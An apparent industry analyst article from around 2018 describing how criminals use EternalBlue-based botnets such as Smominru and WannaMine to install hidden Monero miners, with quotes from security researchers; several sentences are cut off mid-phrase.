Ransomware is oh, so 2017. Today, all the smart hackers have turned to illicit cryptomining to fill their coffers.
Due to a combination of a leaked NSA hack, a cryptocurrency more anonymous than Bitcoin, and benign cryptocurrency transaction processing (aka ‘mining’) software that requires no command and control link back to the attacker, we now have the perfect combination of easy money, slim chance of detection, and billions of unsuspecting targets that may not even care they’ve been hacked.
Criminals around the world are rejoicing, still incredulous at how easy it is to make money while they sleep.
Assembling the Pieces of the ‘Perfect Crime’
In early 2017, a hacker group released into the wild a number of NSA-created hacks including EternalBlue, which made it dead simple to crack open
Meanwhile, cryptocurrency advocates unhappy with Bitcoin’s lack of true anonymity developed Monero, an altcoin better able to hide the tracks of criminal transactions. Guess what? Criminals love it.
The third component of his nefarious enterprise: the fact that all blockchain-based systems leverage distributed transaction processors known as miners, who automatically receive a payment for their efforts in whatever cryptocurrency they choose to process.
Sulfur – saltpeter – charcoal – and bam! The global hacker community just invented gunpowder: the ability to surreptitiously install illicit Monero miners on unsuspecting computers around the world.
Windows servers. Laptops. Android devices. Even IoT endpoints. All of them making money for the bad guys every minute, day and night – any bad guys, really, but most noticeably Russian and Chinese organized crime syndicates.
And you may have no idea you’ve been hacked, other than occasional performance slowdowns and higher electric bills. No ransom notes. No stolen files of passwords or credit card numbers. You may not even be able to convince anybody there’s a problem.
Unraveling the Threat
The most pernicious aspect of illicit cryptomining is how well it flies under the radar of its victims. “In this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom,” explain Nick Biasini, Outreach Engineer; Edmund Brumaghin, Threat Researcher; Warren Mercer, Technical Leader; Josh Reynolds, Information Security Analyst; Azim Khodijbaev, Senior Threat Intelligence Analyst; and David Liebenberg, Senior Threat Analyst; all at the
This attack vector is both profitable and easy to mount – a dangerous combination. “The increase in purchasing power and liquidity is driving valuations, as well as volatility, higher than ever before,” say Ryan McCombs, Senior Consultant; Jason Barnes, Senior Consultant; Karan Sood, Senior Security Researcher; and Ian Barton, Consultant; all at
As a result, illicit cryptomining is rapidly replacing ransomware as the attack vector of choice, especially as cybersecurity vendors bring ransomware protection to market. “What we’re looking at from a near and potentially long-term perspective is the value of a computer that has just a regular old CPU might be more just leaving it quietly running some cryptocurrency miner rather than infecting it with ransomware or some other software that might steal data,” explains Ryan Olson, Intelligence Director at Palo Alto Networks.
Building a Botnet
Large numbers of compromised systems working in concert known as botnets are a common hacker tool, as they can mount distributed denial of service attacks and various other attacks that require massive amounts of coordinated transaction processing.
In the case of illicit cryptomining, however, each node works independently of the others. Criminals simply need to install many miners because each miner only generates a relatively small amount of money. “Talos has observed botnets consisting of millions of infected systems, which…means that these systems could be leveraged to generate more than $100 million per year theoretically,” the Talos team continues. “This is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity.”
There are, in fact, several different exploits that lead to different families of botnets. Perhaps the most pernicious has been dubbed Smominru. “Proofpoint researchers have been tracking the massive Smominru botnet, the combined computing power of which has earned millions of dollars for its operators,” explains Sandiford Oliver, Cybersecurity Researcher for Proofpoint, who goes by the pseudonym Kafeine. “Given the significant profits available to the botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impacts on infected nodes.”
Smominru leverages the EternalBlue exploit from the NSA which targets Windows Management Infrastructure (WMI). The attacker typically mounts a phishing attack with a Microsoft Word file attachment. Once the target downloads the file, it runs a Word macro that executes a Visual Basic script that in turn runs a Microsoft PowerShell script that downloads and installs the miner executable.
Another popular cryptomining worm that leverages WMI weaknesses is WannaMine. “CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine,” says the CrowdStrike team. “Its fileless nature and use of legitimate system software such as WMI and PowerShell make it difficult, if not impossible, for organizations to block it without some form of next-generation antivirus.”
WMI, however, isn’t the only vulnerability. Some researchers report attacks via Microsoft SQL Server and
Show Me the Money
The linchpin that holds the entire nefarious enterprise together is the anonymous cryptocurrency Monero. “Bitcoin alternatives like Monero and Ethereum continue their overall upward trend in value,” Oliver continues, “putting them squarely in the crosshairs of threat actors looking for quick profits and anonymous transactions.”
While other cryptocurrencies play a factor, Monero is shaping up to be the favorite. “This Monero mining botnet is extremely large, made up mostly of Microsoft Windows servers spread around the globe,” says Kevin Epstein, VP of Proofpoint’s Threat Operations Center. “We repeatedly see threat actors ‘follow the money’ - over the last several months, the money has been in cryptocurrency and actors are turning their attention to a variety of illicit means to obtain both Bitcoins and alternatives.”
Oliver seconds this point. “In the last year, we have observed standalone coin miners and coin mining modules in existing malware proliferate rapidly,” he says. “As Bitcoin has become prohibitively resource-intensive to mine outside of dedicated mining farms, interest in Monero has increased dramatically.”
The combination of simple botnets and anonymous cryptocurrency has led to an explosion of illicit activity. “Cryptocurrency miner payloads could be among some of the easiest money makers available for attackers,” the Talos team adds. “There is no need to attempt to compromise hosts to steal documents, passwords, wallets, private keys, as we’ve grown accustomed to seeing from financially motivated attackers.”
Flying Under the Radar
Contrasted with the business-sinking direct assault of ransomware, illicit cryptomining is downright benign. “It’s largely unnoticed by the majority of users,” the Talos team says. “There isn’t any command and control activity and it generates revenue consistently until its removed.”
Command and control is a term for how hackers must ‘phone home’ once they find their target in order to exfiltrate the goods – a step that is no longer necessary in the case of illicit cryptomining. The miner software must simply have the anonymized code representing the attacker’s cryptowallet.
What, then, is actually being stolen? “Attackers are not stealing anything more than computing power from their victims, and the mining software isn’t technically malware,” the Talos team continues. “So theoretically, the victims could remain part of the adversary’s botnet for as long as the attacker chooses.”
However, stealing computing power (and its requisite electricity) isn’t entirely benign. “While cryptocurrency mining has typically been viewed as a nuisance, CrowdStrike has recently seen several cases where mining has impacted business operations,” the CrowdStrike team adds, “rendering some companies unable to operate for days and weeks at a time.”
Proofpoint agrees. “Because most of the nodes in this botnet appear to be Windows servers, the performance impact on potentially critical business infrastructure may be high, as can the cost of increased energy usage by servers running much closer to capacity,” Oliver says.
The Future of Illicit Cryptomining
While the fact that this cyberattack flies under the radar may seem benign, it’s actually the reason why this attack strategy is so dangerous. Unlike ransomware, where businesses demand rapid mitigation technology from software vendors, with illicit cryptomining, the attacks will be able to spread mostly unchecked.
Over time, we can thus expect compromised systems churning away at making money for criminals to reach epidemic proportions. At some point, criminals will increasingly step on each other’s toes, with multiple bad actors attempting to infect the same systems.
At that point, expect to see widespread ‘brownouts’ of computing power, as large swaths of the global computing infrastructure collapse under the weight of multiple botnets, each building the respective fortunes of criminal enterprises around the globe.
This problem is so pernicious, in fact, that software mitigation techniques may turn out to be insufficient to stop its spread. Instead, governments may simply have to pull the plug on cryptocurrency once and for all.
Intellyx publishes the Agile Digital Transformation Roadmap poster, advises companies on their digital transformation initiatives, and helps vendors communicate their agility stories. As of the time of writing, Microsoft is an Intellyx customer. None of the other organizations mentioned in this article are Intellyx customers. Image credit: public domain.
